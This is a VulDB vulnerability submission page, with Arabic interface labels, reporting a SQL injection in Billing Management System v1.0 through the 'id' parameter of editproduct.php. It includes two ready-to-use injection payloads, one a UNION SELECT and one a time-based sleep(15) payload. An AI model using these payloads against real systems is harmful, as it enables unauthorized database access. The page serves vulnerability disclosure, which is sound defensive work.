إرسال #156289: Billing Management System v1.0 /smartbilling_source_code/editproduct.php GET parameter id exists SQL injection vulnerabilityالمعلومات

عنوانBilling Management System v1.0 /smartbilling_source_code/editproduct.php GET parameter id exists SQL injection vulnerability
الوصفAn issue was discovered in Billing Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /smartbilling_source_code/editproduct.php?id. Payload1: id=-1 union all select null,null,null,null,concat(0x565758,0x686970),null,null,null,null-- - Payload2:id=2 and (select 2 from (select(sleep(15)))i)
المصدر⚠️ https://github.com/niyuchunqiu/cve/blob/main/SQL.md
المستخدم
 lixu (UID 46762)
ارسال14/05/2023 05:06 AM (3 سنوات منذ)
الاعتدال14/05/2023 09:36 AM (5 hours later)
الحالةتمت الموافقة
إدخال VulDB228970 [SourceCodester Billing Management System 1.0 GET Parameter editproduct.php معرف حقن SQL]
النقاط19

Do you want to use VulDB in your project?

Use the official API to access entries easily!